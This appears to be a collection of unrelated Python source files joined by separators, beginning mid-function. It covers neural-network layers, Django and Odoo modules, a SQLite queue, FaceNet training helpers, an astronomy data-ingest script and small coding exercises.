in_bandpass = InputLayer((self.n_examples, self.n_time_steps, self.n_chans, self.n_filters))
l_bandpass = BandpassLayer([in_l, in_bandpass], n_filt_order=self.n_filt_order,
truncate_gradient=self.truncate_gradient)
# out comes examples x timesteps x chans x filters
l_spat_filt = TensorDotLayer(l_bandpass, n_filters=self.n_spat_filters,
axis=2)
# still examples x timesteps x chans x filters
l_square = NonlinearityLayer(l_spat_filt, T.sqr)
# now adding empty chan dim so we can make pooling per output chan
l_shape_pad = DimshuffleLayer(l_square, (0,'x',1,2,3))
# examples x convchans x timesteps x chans x filters
l_pooled = Pool3DDNNLayer(l_shape_pad, pool_size=(self.n_pool_len,1,1),
stride=1, mode='average_exc_pad')
l_log = NonlinearityLayer(l_pooled, safe_log)
# removing empty convchan dim again
l_sliced = SliceLayer(l_log,indices=0,axis=1)
# now examples x timesteps x chans x filters
l_flat = FlattenLayer(l_sliced,outdim=3)
# now examples x timesteps x features (chans * filters)
l_dense = TensorDotLayer(l_flat,n_filters=1, axis=2)
# now examples x timesteps x 1
l_nonlin = NonlinearityLayer(l_dense, sigmoid)
return lasagne.layers.get_all_layers(l_nonlin) |
from connection import db, Required, PrimaryKey, Optional
class SysModul(db.Entity):
_table_ = 'sys_modul'
sysmodul_kode = PrimaryKey(str)
sysmodul_nama = Required(str)
sysmodul_url = Required(str)
sysmodul_icon = Required(str)
sysmodul_parent = Optional(str, nullable=True)
sysmodul_no_urut = Required(int)
|
"""
通讯录列表页
"""
from app.企业微信po.page import AddMeberPage
from app.企业微信po.page.basepage import BasePage
class ContactListPage(BasePage):
# def __init__(self,driver):
# self.driver = driver
addmember_text = "添加成员"
def add_contact(self):
"""
添加成员
:return:
"""
addmember_text = "添加成员"
# 点击添加成员
# self.driver.find_element(
# MobileBy.ANDROID_UIAUTOMATOR, 'new UiScrollable'
# '(new UiSelector().'
# 'scrollable(true).'
# 'instance(0)).'
# 'scrollIntoView('
# 'new UiSelector().'
# 'text("添加成员").instance(0));').click()
self.find_by_scroll(self.addmember_text).click() # 改造后
return AddMeberPage(self.driver)
def search_contact(self):
"""
搜索人员
:return:
"""
pass
|
#!/usr/bin/env /data/mta/Script/Python3.8/envs/ska3-shiny/bin/python
#########################################################################################
# #
# sci_run_get_radiation_data.py: get NOAA data for radiaiton plots #
# #
# #
# author: t. isobe (tisobe@cfa.harvard.edu) #
# #
# last update: Mar 09, 2021 #
# #
#########################################################################################
import os
import sys
import re
import string
import time
import Chandra.Time
import random
#
#--- reading directory list
#
path = '/data/mta/Script/Interrupt/Scripts/house_keeping/dir_list'
with open(path, 'r') as f:
data = [line.strip() for line in f.readlines()]
for ent in data:
atemp = re.split(':', ent)
var = atemp[1].strip()
line = atemp[0].strip()
exec("%s = %s" %(var, line))
#
#--- append a path to a private folder to python directory
#
sys.path.append(bin_dir)
sys.path.append(mta_dir)
#
import mta_common_functions as mcf
#
#--- temp writing file name
#
rtail = int(time.time() * random.random())
zspace = '/tmp/zspace' + str(rtail)
#-----------------------------------------------------------------------------------------------
#--- sci_run_get_radiation_data: extract radiation data ---
#-----------------------------------------------------------------------------------------------
def sci_run_get_radiation_data():
"""
create ACE database
input: none but read from:
/data/mta4/Space_Weather/ACE/Data/ace_7day_archive
output: <data_dir>/rad_dta<year>
"""
#
#--- find today's date
#
today = time.strftime("%Y:%j:%H:%M:%S", time.gmtime())
atemp = re.split(':', today)
year = int(float(atemp[0]))
yday = int(float(atemp[1]))
#
#--- if this is 1st of the year, start from the last day of the last year
#
oyear = year
if yday == 1:
oyear = year -1
#
#--- read the current data file and find the last entry date/time
#
ifile = data_dir + 'rad_data' + str(oyear)
cdata = mcf.read_data_file(ifile)
try:
atemp = re.split('\s+', cdata[-1])
lyear = int(float(atemp[0]))
ltime = get_data_time(cdata[-1])
except:
lyear = oyear
ltime = 0.0
#
#--- read new data from noaa site via ace site
#
ifile = '/data/mta4/Space_Weather/ACE/Data/ace_7day_archive'
data = mcf.read_data_file(ifile)
#
#--- set two data lines; one for this year and another for the potential following year
#
oline = ''
nline = ''
for ent in data:
atemp = re.split('\s+', ent)
tyear = int(float(atemp[0]))
stime = get_data_time(ent)
if stime > ltime:
if tyear == lyear:
oline = oline + ent + '\n'
#
#--- a new year started
#
elif tyear > lyear:
nline = nline + ent + '\n'
#
#--- print out the data
#
if len(oline) > 0:
ofile = data_dir + 'rad_data' + str(oyear)
with open(ofile, 'a') as fo:
fo.write(oline)
if len(nline) > 0:
ofile = data_dir + 'rad_data' + str(year)
with open(ofile, 'w') as fo:
fo.write(oline)
#--------------------------------------------------------------------
#-- get_data_time: find time of the data line given in seconds from 1998.1.1
#--------------------------------------------------------------------
def get_data_time(line):
"""
find time of the data line given in seconds from 1998.1.1
input: line --- data line with the first few entries are time related
output: ltime --- time in seconds from 1998.1.1
"""
atemp = re.split('\s+', line)
dyear = int(float(atemp[0]))
mon = int(float(atemp[1]))
day = int(float(atemp[2]))
hh = int(float(atemp[3][0]+atemp[3][1]))
mm = int(float(atemp[3][2]+atemp[3][3]))
ltime = convert_to_ctime(dyear, mon, day, hh, mm, 0)
return ltime
#--------------------------------------------------------------------
#--- convert_to_ctime: convert time in Chandra time --
#--------------------------------------------------------------------
def convert_to_ctime(year, mon, day, hh, mm, ss):
"""
convert time in Chandra time
input: year --- year
mon --- month
day --- mday
hh --- houris
mm --- minutes
ss --- seconds
output: ctime --- chandra time; seconds from 1998.1.1
"""
ctime = str(year) + ':' + mcf.add_leading_zero(mon) + ':' + mcf.add_leading_zero(day)
ctime = ctime + ':' + mcf.add_leading_zero(hh) + ':' + mcf.add_leading_zero(mm)
ctime = ctime + ':' + mcf.add_leading_zero(ss)
ctime = time.strftime('%Y:%j:%H:%M:%S', time.strptime(ctime, '%Y:%m:%d:%H:%M:%S'))
ctime = Chandra.Time.DateTime(ctime).secs
return ctime
#--------------------------------------------------------------------
if __name__ == '__main__':
sci_run_get_radiation_data()
|
''' Perform sentiment analysis on the data'''
# import re
# from typing import List
# import logging
# import numpy as np
# import nltk
# from nltk.sentiment.vader import SentimentIntensityAnalyzer
# from wordcloud import WordCloud
# from geotext import GeoText
# logging.basicConfig(format='%(asctime)s : %(levelname)s : %(message)s')
# def get_nation(text: str) -> str:
# '''
# Get the name of the country mentioned in the text
# ARGS:
# text: Text to be analysed
# RETURNS:
# country: Country with the most mentions in the text
# '''
# mentions = GeoText(text).country_mentions
# if mentions:
# highest_mention_code = max(mentions, key=mentions.get)
# for country, code in GeoText.index.countries.items():
# if code == highest_mention_code:
# return country.lower()
# else:
# return ''
# def get_sentiment(sentiment_predictor: object, document_list: [str]) -> float:
# '''
# Make sentimnet predictions on test data
# ARGS:
# text: List of docs to be analysed
# sentiment_predictor: Model to be used for prediction
# RETURNS:
# sentiment: Get the sentiment value as floating point number
# in the range 0 to 1. 0 Being completely negative and 1 being
# totally positive
# '''
# logging.info('Calculating sentiment...')
# predictions = sentiment_predictor.predict(document_list)
# positives = np.array([pos_prob for pos_prob, neg_prob in predictions])
# mean_positive_sentiment = np.mean(positives)
# return mean_positive_sentiment
# def make_cloud(text: str, outpath: str):
# '''
# Create word cloud and save to path
# ARGS:
# text: Text to be analysed
# outpath: Output path for the word cloud
# '''
# cloud = WordCloud(
# width=400,
# height=400,
# background_color='white',
# max_words=50
# )
# logging.info('Generating word cloud...')
# cloud.generate(text)
# cloud.to_file(outpath)
# def _remove_geography_mentions(text: str) -> str:
# '''Remove geographic mentions from text'''
# geo_obj = GeoText(text)
# geographic_mentions = geo_obj.countries + geo_obj.cities + geo_obj.nationalities
# for m in geographic_mentions:
# text = text.replace(m, ' ')
# return text
# class SentimentAnalyzer(object):
# '''
# Uses sentiment analyser that outputs the sentiment
# in form of dictionary
# The sentiment ranges from -1 to 1
# -1 : Completely negative
# +1 : Completely positive
# 0 : Neutral
# Sentiment Analyzer output
# neg: Negative emotion
# neu: Neutral emotion
# pos: Positive sentiment
# '''
# def __init__(self, article):
# self._article = self.clean_quotes(article)
# self._analyzer = SentimentIntensityAnalyzer()
# @staticmethod
# def clean_quotes(article):
# double_quote_open = u'\u201C'
# double_quote_close = u'\u201D'
# for quote in [double_quote_open, double_quote_close]:
# article = article.replace(quote, '"')
# return article
# @property
# def article(self):
# return self._article
# def mean_sentiment(self) -> float:
# sentiment_arr = self.compound_sentiment()
# return np.mean(sentiment_arr)
# def compound_sentiment(self) -> List[float]:
# quoted_text_list = self.quotes()
# sentiment_list = [self._analyzer.polarity_scores(q) for q in quoted_text_list]
# compound_sentiment_list = [
# sentiment.get('compound') for sentiment in sentiment_list
# ]
# return compound_sentiment_list
# def negative_sentiment(self) -> List[float]:
# quoted_text_list = self.quotes()
# sentiment_list = [self._analyzer.polarity_scores(q) for q in quoted_text_list]
# negative_sentiment_list = [
# sentiment.get('neg') for sentiment in sentiment_list
# ]
# return negative_sentiment_list
# def positive_sentiment(self) -> List[float]:
# quoted_text_list = self.quotes()
# sentiment_list = [self._analyzer.polarity_scores(q) for q in quoted_text_list]
# positive_sentiment_list = [
# sentiment.get('pos') for sentiment in sentiment_list
# ]
# return positive_sentiment_list
# def quotes(self) -> [str]:
# '''Get quoted text from the article'''
# quoted_regex = re.compile('\".*\"')
# quoted_text_list = re.findall(quoted_regex, self._article)
# return quoted_text_list
|
prices = [99, 72, 30, 29, 55]
# new_prices = [round(s - (s * 10 / 100), 2) if s > 50 else s for s in prices]
# print(new_prices)
# for index, item in enumerate(prices):
# if item > 50:
# prices[index] = round(prices[index] - (prices[index] * 10 / 100))
# print(prices)
# for index,item in enumerate(prices):
# if item > 50:
# prices[index]=round(prices[index]-(prices[index] *10 / 100))
# print(prices)
List=[1,2,3,4,5,6,7,9]
for index,item in enumerate(List):
if List[index]<5:
NewList=str(list(List[index]))
print(NewList)
# a= 1
# [a]
# b=list(a)
# print(b)
|
# coding=utf-8
"""A thread-safe sqlite3 based persistent queue in Python."""
import logging
import sqlite3
import time as _time
import threading
from persistqueue import sqlbase
sqlite3.enable_callback_tracebacks(True)
log = logging.getLogger(__name__)
class SQLiteQueue(sqlbase.SQLiteBase):
"""SQLite3 based FIFO queue."""
_TABLE_NAME = 'queue'
_KEY_COLUMN = '_id' # the name of the key column, used in DB CRUD
# SQL to create a table
_SQL_CREATE = (
'CREATE TABLE IF NOT EXISTS {table_name} ('
'{key_column} INTEGER PRIMARY KEY AUTOINCREMENT, '
'data BLOB, timestamp FLOAT)'
)
# SQL to insert a record
_SQL_INSERT = 'INSERT INTO {table_name} (data, timestamp) VALUES (?, ?)'
# SQL to select a record
_SQL_SELECT_ID = (
'SELECT {key_column}, data, timestamp FROM {table_name} WHERE'
' {key_column} = {rowid}'
)
_SQL_SELECT = (
'SELECT {key_column}, data, timestamp FROM {table_name} '
'ORDER BY {key_column} ASC LIMIT 1'
)
_SQL_SELECT_WHERE = (
'SELECT {key_column}, data, timestamp FROM {table_name} WHERE'
' {column} {op} ? ORDER BY {key_column} ASC LIMIT 1 '
)
_SQL_UPDATE = 'UPDATE {table_name} SET data = ? WHERE {key_column} = ?'
_SQL_DELETE = 'DELETE FROM {table_name} WHERE {key_column} {op} ?'
def put(self, item, block=True):
# block kwarg is noop and only here to align with python's queue
obj = self._serializer.dumps(item)
_id = self._insert_into(obj, _time.time())
self.total += 1
self.put_event.set()
return _id
def put_nowait(self, item):
return self.put(item, block=False)
def _init(self):
super(SQLiteQueue, self)._init()
# Action lock to assure multiple action to be *atomic*
self.action_lock = threading.Lock()
if not self.auto_commit:
# Refresh current cursor after restart
head = self._select()
if head:
self.cursor = head[0] - 1
else:
self.cursor = 0
self.total = self._count()
FIFOSQLiteQueue = SQLiteQueue
class FILOSQLiteQueue(SQLiteQueue):
"""SQLite3 based FILO queue."""
_TABLE_NAME = 'filo_queue'
# SQL to select a record
_SQL_SELECT = (
'SELECT {key_column}, data FROM {table_name} '
'ORDER BY {key_column} DESC LIMIT 1'
)
class UniqueQ(SQLiteQueue):
_TABLE_NAME = 'unique_queue'
_SQL_CREATE = (
'CREATE TABLE IF NOT EXISTS {table_name} ('
'{key_column} INTEGER PRIMARY KEY AUTOINCREMENT, '
'data BLOB, timestamp FLOAT, UNIQUE (data))'
)
def put(self, item):
obj = self._serializer.dumps(item, sort_keys=True)
_id = None
try:
_id = self._insert_into(obj, _time.time())
except sqlite3.IntegrityError:
pass
else:
self.total += 1
self.put_event.set()
return _id
|
n,m = map(int,input().split())
connections = sorted([list(map(int,input().split())) for _ in range(m)], key = lambda x: x[1])
cut = 0
ans = 0
for i in range(m):
if connections[i][0] >= cut:
ans += 1
cut = connections[i][1]
print(ans)
|
my_list = range(16)
print filter(lambda x: x % 3 == 0, my_list)
languages = ["HTML", "JavaScript", "Python", "Ruby"]
print filter(lambda x: x == "Python", languages)
squares = range(1, 11)
squares = [x**2 for x in range(1,11) if (x**2 == x**2)]
print squares
print filter(lambda x: x > 30 and x < 70, squares) |
import sys
from typing import List
from leetcode import TreeNode, new_tree
def postorder_traversal(root: TreeNode) -> List[int]:
stack, result = [], []
temp = root
while temp or stack:
if temp:
result.append(temp.val)
stack.append(temp)
temp = temp.right
else:
temp = stack.pop().left
result.reverse()
return result
def postorder_traversal_recursively(root: TreeNode) -> List[int]:
result = []
def recurse(node: TreeNode) -> None:
if node:
recurse(node.left)
recurse(node.right)
result.append(node.val)
recurse(root)
return result
tests = [
new_tree(1, None, 2, 3),
]
for tree in tests:
expect = postorder_traversal_recursively(tree)
actual = postorder_traversal(tree)
if expect != actual:
message = f"tree: {tree}\nactual: {actual}\nexpect: {expect}"
print(message, file=sys.stderr)
sys.exit(1)
|
from __future__ import print_function
import os
from oauth2client import tools, client
from oauth2client.file import Storage
class Authentication:
def __init__(self):
try:
import argparse
self.flags = argparse.ArgumentParser(parents=[tools.argparser]).parse_args()
except ImportError:
self.flags = None
self.setDefaultCredentialProperties()
def setDefaultCredentialProperties(self):
self.homeDir = os.path.expanduser('~')
self.credentialDir = os.path.join(self.homeDir, '.credentials')
if not os.path.exists(self.credentialDir):
os.makedirs(self.credentialDir)
self.credentialPath = os.path.join(self.credentialDir, 'calendar-python-quickstart.json')
def getCredentials(self, myClient):
store = Storage(self.credentialPath)
credentials = store.get()
if not credentials or credentials.invalid:
flow = client.flow_from_clientsecrets(myClient.getSecretFileName(), myClient.getScopeByType('readonly'))
flow.user_agent = myClient.applicationName
if self.flags:
credentials = tools.run_flow(flow, store, self.flags)
print('Storing credentials to ' + self.credentialPath)
return credentials
|
from django.apps import AppConfig
class IssuesConfig(AppConfig):
name = 'issues'
|
"""Functions for building the face recognition network.
"""
# MIT License
#
# Copyright (c) 2016 David Sandberg
#
# Permission is hereby granted, free of charge, to any person obtaining a copy
# of this software and associated documentation files (the "Software"), to deal
# in the Software without restriction, including without limitation the rights
# to use, copy, modify, merge, publish, distribute, sublicense, and/or sell
# copies of the Software, and to permit persons to whom the Software is
# furnished to do so, subject to the following conditions:
#
# The above copyright notice and this permission notice shall be included in all
# copies or substantial portions of the Software.
#
# THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR
# IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY,
# FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE
# AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER
# LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM,
# OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN THE
# SOFTWARE.
# pylint: disable=missing-docstring
from __future__ import absolute_import
from __future__ import division
from __future__ import print_function
import os
from subprocess import Popen, PIPE
import tensorflow as tf
from tensorflow.python.framework import ops
import numpy as np
from scipy import misc
import matplotlib.pyplot as plt
from sklearn.cross_validation import KFold
from scipy import interpolate
from tensorflow.python.training import training
import random
import re
from collections import Counter
import matplotlib.pyplot as plt
import cv2
import python_getdents
from scipy import spatial
from sklearn.decomposition import PCA
from itertools import islice
import itertools
def _add_loss_summaries(total_loss):
"""Add summaries for losses.
Generates moving average for all losses and associated summaries for
visualizing the performance of the network.
Args:
total_loss: Total loss from loss().
Returns:
loss_averages_op: op for generating moving averages of losses.
"""
# Compute the moving average of all individual losses and the total loss.
loss_averages = tf.train.ExponentialMovingAverage(0.9, name='avg')
losses = tf.get_collection('losses')
loss_averages_op = loss_averages.apply(losses + [total_loss])
# Attach a scalar summmary to all individual losses and the total loss; do the
# same for the averaged version of the losses.
for l in losses + [total_loss]:
# Name each loss as '(raw)' and name the moving average version of the loss
# as the original loss name.
tf.summary.scalar(l.op.name + ' (raw)', l)
tf.summary.scalar(l.op.name, loss_averages.average(l))
return loss_averages_op
def train(total_loss, global_step, optimizer, learning_rate, moving_average_decay, update_gradient_vars, summary, log_histograms=True):
# Generate moving averages of all losses and associated summaries.
loss_averages_op = _add_loss_summaries(total_loss)
print('######## length of update_gradient_vars: %d\n' % len(update_gradient_vars))
# Compute gradients.
with tf.control_dependencies([loss_averages_op]):
if optimizer=='ADAGRAD':
opt = tf.train.AdagradOptimizer(learning_rate)
elif optimizer=='ADADELTA':
opt = tf.train.AdadeltaOptimizer(learning_rate, rho=0.9, epsilon=1e-6)
elif optimizer=='ADAM':
opt = tf.train.AdamOptimizer(learning_rate, beta1=0.9, beta2=0.999, epsilon=0.1)
elif optimizer=='RMSPROP':
opt = tf.train.RMSPropOptimizer(learning_rate, decay=0.9, momentum=0.9, epsilon=1.0)
elif optimizer=='MOM':
opt = tf.train.MomentumOptimizer(learning_rate, 0.9, use_nesterov=True)
else:
raise ValueError('Invalid optimization algorithm')
grads = opt.compute_gradients(total_loss, update_gradient_vars)
### gradient clip for handling the gradient exploding
gradslist, varslist = zip(*grads)
grads_clip, _ = tf.clip_by_global_norm(gradslist, 5.0)
#grads_clip = [(tf.clip_by_value(grad, -1.0, 1.0),var) for grad, var in grads]
# Apply gradients.
#apply_gradient_op = opt.apply_gradients(grads, global_step=global_step)
#apply_gradient_op = opt.apply_gradients(grads_clip, global_step=global_step)
apply_gradient_op = opt.apply_gradients(zip(grads_clip, varslist), global_step=global_step)
# Add histograms for trainable variables.
if log_histograms:
#for var in tf.trainable_variables():
for var in update_gradient_vars:
tf.summary.histogram(var.op.name, var)
# Add histograms for gradients.
if log_histograms:
for grad, var in grads:
if grad is not None:
tf.summary.histogram(var.op.name + '/gradients', grad)
# Track the moving averages of all trainable variables.
variable_averages = tf.train.ExponentialMovingAverage(moving_average_decay, global_step)
#variables_averages_op = variable_averages.apply(tf.trainable_variables())
variables_averages_op = variable_averages.apply(update_gradient_vars)
with tf.control_dependencies([apply_gradient_op, variables_averages_op]):
#with tf.control_dependencies([apply_gradient_op]):
train_op = tf.no_op(name='train')
print('######## length of update_gradient_vars: %d\n' % len(update_gradient_vars))
return train_op, grads, grads_clip
def train_layerwise(total_loss, global_step, optimizer, learning_rate, moving_average_decay, update_gradient_vars, log_histograms=True):
# Generate moving averages of all losses and associated summaries.
loss_averages_op = _add_loss_summaries(total_loss)
print('######## length of update_gradient_vars: %d\n' % len(update_gradient_vars))
# Compute gradients.
# with tf.control_dependencies([loss_averages_op]):
# if optimizer=='ADAGRAD':
# opt = tf.train.AdagradOptimizer(learning_rate)
# elif optimizer=='ADADELTA':
# opt = tf.train.AdadeltaOptimizer(learning_rate, rho=0.9, epsilon=1e-6)
# elif optimizer=='ADAM':
# opt = tf.train.AdamOptimizer(learning_rate, beta1=0.9, beta2=0.999, epsilon=0.1)
# elif optimizer=='RMSPROP':
# opt = tf.train.RMSPropOptimizer(learning_rate, decay=0.9, momentum=0.9, epsilon=1.0)
# elif optimizer=='MOM':
# opt = tf.train.MomentumOptimizer(learning_rate, 0.9, use_nesterov=True)
# else:
# raise ValueError('Invalid optimization algorithm')
# grads = opt.compute_gradients(total_loss, update_gradient_vars)
# Apply gradients.
#apply_gradient_op = opt.apply_gradients(grads, global_step=global_step)
beta = 100
with tf.control_dependencies([loss_averages_op]):
if optimizer=='ADAGRAD':
opt1 = tf.train.AdagradOptimizer(learning_rate/beta)
opt2 = tf.train.AdagradOptimizer(learning_rate)
elif optimizer=='ADADELTA':
opt1 = tf.train.AdadeltaOptimizer(learning_rate/beta, rho=0.9, epsilon=1e-6)
opt2 = tf.train.AdadeltaOptimizer(learning_rate, rho=0.9, epsilon=1e-6)
elif optimizer=='ADAM':
opt1 = tf.train.AdamOptimizer(learning_rate/beta, beta1=0.9, beta2=0.999, epsilon=0.1)
opt2 = tf.train.AdamOptimizer(learning_rate, beta1=0.9, beta2=0.999, epsilon=0.1)
elif optimizer=='RMSPROP':
opt1 = tf.train.RMSPropOptimizer(learning_rate/beta, decay=0.9, momentum=0.9, epsilon=1.0)
opt2 = tf.train.RMSPropOptimizer(learning_rate, decay=0.9, momentum=0.9, epsilon=1.0)
elif optimizer=='MOM':
opt1 = tf.train.MomentumOptimizer(learning_rate/beta, 0.9, use_nesterov=True)
opt2 = tf.train.MomentumOptimizer(learning_rate, 0.9, use_nesterov=True)
else:
raise ValueError('Invalid optimization algorithm')
## glabal learning rate
## layer-wise learning rate for updating the gradients
update_gradient_vars1 = []
update_gradient_vars2 = []
for var in update_gradient_vars:
if not ('Embeddings/' in var.op.name or 'Centralisation/' in var.op.name or 'centers' in var.op.name or 'centers_cts' in var.op.name):
update_gradient_vars1.append(var)
else:
update_gradient_vars2.append(var)
grads1 = opt1.compute_gradients(total_loss, update_gradient_vars1)
grads2 = opt2.compute_gradients(total_loss, update_gradient_vars2)
#grads = tf.group(grads1, grads2)
grads = grads1 + grads2
apply_gradient_op1 = opt1.apply_gradients(grads1, global_step=global_step)
apply_gradient_op2 = opt2.apply_gradients(grads2, global_step=global_step)
apply_gradient_op = tf.group(apply_gradient_op1, apply_gradient_op2)
# Add histograms for trainable variables.
if log_histograms:
for var in tf.trainable_variables():
tf.summary.histogram(var.op.name, var)
# Add histograms for gradients.
if log_histograms:
for grad, var in grads:
if grad is not None:
tf.summary.histogram(var.op.name + '/gradients', grad)
# Track the moving averages of all trainable variables.
variable_averages = tf.train.ExponentialMovingAverage(
moving_average_decay, global_step)
variables_averages_op = variable_averages.apply(tf.trainable_variables())
with tf.control_dependencies([apply_gradient_op, variables_averages_op]):
train_op = tf.no_op(name='train')
return train_op
|
from django.contrib import admin
from django.urls import path
import firstapp.views
urlpatterns = [
path('admin/', admin.site.urls),
path('', firstapp.views.home, name="home"),
path('about/', firstapp.views.about, name="about"),
path('result/', firstapp.views.result, name="result"),
]
|
from string import maketrans, ascii_lowercase as low, ascii_uppercase as up
TRANSLATION = maketrans(up + low, up[::-1] + low[::-1])
def decode(string):
return string.translate(TRANSLATION) \
if isinstance(string, str) else 'Input is not a string'
|
# -*- coding: utf-8 -*-
##############################################################################
#
# Copyright (C) 2013-2015 Marcos Organizador de Negocios SRL http://marcos.do
# Write by Eneldo Serrata (eneldo@marcos.do)
#
# This program is free software: you can redistribute it and/or modify
# it under the terms of the GNU Affero General Public License as
# published by the Free Software Foundation, either version 3 of the
# License, or (at your option) any later version.
#
# This program is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU Affero General Public License for more details.
#
# You should have received a copy of the GNU Affero General Public License
# along with this program. If not, see <http://www.gnu.org/licenses/>.
#
##############################################################################
from datetime import datetime, timedelta
from openerp import models, fields, api, _
from openerp.tools import DEFAULT_SERVER_DATE_FORMAT
from openerp.exceptions import except_orm, Warning, RedirectWarning
class account_invoice(models.Model):
_inherit = 'account.invoice'
@api.one
@api.depends("parent_id")
def _get_no_more_cn(self):
ncs = self.parent_id.child_ids
if ncs:
self.parent_id.no_more_cn = sum(
[nc.amount_untaxed for nc in ncs if nc.state not in ["cancel"]]) >= self.parent_id.amount_untaxed
parent_id = fields.Many2one('account.invoice',
'Afecta',
readonly=True,
states={'draft': [('readonly', False)]},
help='Factura que afecta')
child_ids = fields.One2many('account.invoice',
'parent_id',
u'Notas de credito',
readonly=True,
states={'draft': [('readonly', False)]},
help=u'Estas son todas las de credito para esta factura')
no_more_cn = fields.Boolean(default=False, copy=False)
parent_id_number = fields.Char(related="parent_id.number")
def copy(self, cr, uid, id, default={}, context=None):
""" Allows you to duplicate a record,
child_ids, nro_ctrl and reference fields are
cleaned, because they must be unique
"""
if context is None:
context = {}
default.update({
'child_ids': [],
})
return super(account_invoice, self).copy(cr, uid, id, default, context)
def set_amount_untaxed(self, parent_id, vals):
parent_invoice = self.browse(parent_id)
if not vals.get("state", False) and len(vals) == 1:
if vals.get("state", False) == "cancel":
parent_invoice.no_more_cn = (sum([nc.amount_untaxed for nc in parent_invoice.child_ids if nc.state not in ["cancel"]]) - self.amount_untaxed) >= parent_invoice.amount_untaxed
else:
parent_invoice.no_more_cn = (sum([nc.amount_untaxed for nc in parent_invoice.child_ids if nc.state not in ["cancel"]]) + self.amount_untaxed) >= parent_invoice.amount_untaxed
@api.multi
def write(self, vals):
if self.parent_id and self.type in ("in_refund", "out_refund"):
if vals.get("state", False) == "cancel":
self.parent_id.no_more_cn = (sum([nc.amount_untaxed for nc in self.parent_id.child_ids if nc.state not in ["cancel"]]) - self.amount_untaxed) == self.parent_id.amount_untaxed
else:
self.parent_id.no_more_cn = (sum([nc.amount_untaxed for nc in self.parent_id.child_ids if nc.state not in ["cancel"]]) + self.amount_untaxed) == self.parent_id.amount_untaxed
# remove tax from out_refund if parent_id date_invoice > 30 days Dominican Rules
if self.type == "out_refund" and (
vals.get("date_invoice", False) or self.date_invoice) and self.parent_id:
date_invoice = vals.get("date_invoice", False) or self.date_invoice
delta = datetime.strptime(self.parent_id.date_invoice, DEFAULT_SERVER_DATE_FORMAT) - datetime.strptime(
date_invoice, DEFAULT_SERVER_DATE_FORMAT)
if delta.days > 30:
if vals.get("invoice_line", False):
for line in vals["invoice_line"]:
if line[2].get("invoice_line_tax_id", False):
del line[2]["invoice_line_tax_id"]
for line in self.invoice_line:
if line.invoice_line_tax_id:
line.invoice_line_tax_id = False
self.tax_line = False
return super(account_invoice, self).write(vals)
|
"""votes URL Configuration
The `urlpatterns` list routes URLs to views. For more information please see:
https://docs.djangoproject.com/en/1.8/topics/http/urls/
Examples:
Function views
1. Add an import: from my_app import views
2. Add a URL to urlpatterns: url(r'^$', views.home, name='home')
Class-based views
1. Add an import: from other_app.views import Home
2. Add a URL to urlpatterns: url(r'^$', Home.as_view(), name='home')
Including another URLconf
1. Add an import: from blog import urls as blog_urls
2. Add a URL to urlpatterns: url(r'^blog/', include(blog_urls))
"""
from django.conf import settings
from django.conf.urls import include, url
from django.conf.urls.static import static
from django.contrib import admin
from django.contrib.auth import views as auth_views
from django.contrib.auth.decorators import login_required as _lr
from .views import (
SignUpView, VotingListView, VotingAddView, VotingResultsView,
VotingView, UsersVotingListView
)
urlpatterns = [
url('^$', VotingListView.as_view(),
name='vote_home'),
url('^login/$',
auth_views.login, {'template_name': 'votes/login.html'},
name='votes_login'),
url('^logout/$',
auth_views.logout, {'template_name': 'votes/logout.html'},
name='votes_logout'),
url('^signup/$',
SignUpView.as_view(),
name='votes_signup'),
url('^votings/$',
_lr(UsersVotingListView.as_view()),
name='votes_voting_list'),
url('^votings/add/$',
_lr(VotingAddView.as_view()),
name='votes_voting_add'),
url('^vote-for/(?P<slug>[-\w]+)/$',
VotingView.as_view(),
name='votes_voting'),
url('^vote-for/(?P<slug>[-\w]+)/results/$',
VotingResultsView.as_view(),
name='votes_voting_results'),
url(r'^admin/', include(admin.site.urls)),
] + static(settings.STATIC_URL, document_root=settings.STATIC_ROOT)
|
import numpy as np
from sklearn.externals import joblib
from sklearn.feature_extraction.text import CountVectorizer
from sklearn.decomposition import LatentDirichletAllocation
from time import time
class LDA:
def __init__(self):
self.corpus = []
self.dataset = np.load('news.npy')
for i in self.dataset:
self.corpus.append(' '.join(x.replace(u'\xa0', '').replace(u' ', '') for x in i))
def print_top_words(self, model, feature_names, n_top_words):
for topic_idx, topic in enumerate(model.components_):
message = "Topic #%d: " % topic_idx
message += " ".join([feature_names[i]
for i in topic.argsort()[:-n_top_words - 1:-1]])
print(message)
print()
def tf(self):
n_samples = 2000
n_features = 1000
n_components = 5
n_top_words = 20
#
# t0 = time()
# dataset = fetch_20newsgroups(shuffle=True, random_state=1,
# remove=('headers', 'footers', 'quotes'))
# data_samples = dataset.data[:n_samples]
# print("done in %0.3fs." % (time() - t0))
#
# print(data_samples)
# print(self.corpus)
# print(self.dataset)
#
# Use tf (raw term count) features for LDA.
print("Extracting tf features for LDA...")
tf_vectorizer = CountVectorizer(max_df=0.95, min_df=2,
max_features=n_features)
t0 = time()
tf = tf_vectorizer.fit_transform(self.corpus)
print("done in %0.3fs." % (time() - t0))
print()
print("Fitting LDA models with tf features, "
"n_samples=%d and n_features=%d..."
% (n_samples, n_features))
lda = LatentDirichletAllocation(n_components=n_components, max_iter=1000,
learning_method='online',
learning_offset=50.,
random_state=0)
t0 = time()
lda.fit(tf)
print("done in %0.3fs." % (time() - t0))
print("\nTopics in LDA model:")
tf_feature_names = tf_vectorizer.get_feature_names()
return lda, tf_feature_names, n_top_words
if __name__ == '__main__':
lda_model = LDA()
lda, tf_feature_names, n_top_words = lda_model.tf()
lda_model.print_top_words(lda, tf_feature_names, n_top_words)
|
#B
a1,b1,c1=input().split()
if(b1=='/'):
print(int(a1)//int(c1))
else:
print(int(a1)%int(c1))
|
from django.contrib import admin
from .models import Hottake
admin.site.register(Hottake)
|
import datetime
import os
import goldencheetah
# TODO Get rid of this hack in this headless version (or keep it so I can make
# TODO a hybrid script that also runs in GC?)
